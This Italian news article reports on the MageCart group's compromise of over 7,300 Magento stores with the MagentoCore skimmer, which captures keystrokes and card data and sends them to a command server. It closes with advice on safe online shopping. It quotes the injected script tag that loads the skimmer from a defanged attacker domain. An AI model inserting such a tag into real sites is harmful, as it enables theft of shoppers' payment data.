Magento CMS, sono oltre 7300 i siti e-commerce in tutto il mondo presi di mira dal gruppo di cyber-criminali russo MageCart.
Negli ultimi sei mesi oltre 7300 negozi di e-commerce sono stati hackerati, centinaia di carte di credito e dati personali dei clienti sono stati rubati e inviati verso un server remoto ospitato in Russia.
Willem de Groot security consultant & researcher e co-fondatore di byte.nl, un hosting che offre ai propri clienti una versione personalizzata e più sicura (Hypernode) di Magento, ha scoperto uno script malevolo (MagentoCore) installato all’interno dei siti colpiti dai cyber-criminali russi e che serve a registrare la sequenza dei tasti battuti, la sequenza verrà successivamente inviata a un C&C (server command-and-control).
Questo lo script aggiunto al codice del CMS da MageCart una volta compromesso il sito
<script type = “text / javascript” src = “hxxps: //magentocore.net/mage/mage.js” > </ script>
Una backdoor creata da MageCart permette al gruppo di hacker l’accesso al sito e il ripristino dell’infezione qualora il JavaScript infetto venisse rimosso.
Inoltre MagentoCore cerca ed elimina malware simili presenti all’interno del sito web, modifica la password d’accesso degli account-utente del sito.
Quindi effettuare acquisti online non è sicuro?
Gli acquisti online sono sicuri se effettuati su siti conosciuti e se il nostro sistema operativo è aggiornato con le installazioni delle ultime patch. Anche la protezione per “navigare” in internet affidata a prodotti di una certa qualità riduce di molto la percentuale di rischio. Ultima cosa, ma non per questo meno importante, prendete l’abitudine di utilizzare le tastiere virtuali quando andate ad inserire nei form dati sensibili come nomi account, password o numeri della vostra carta di credito… molte suite per la sicurezza ne offrono una integrata.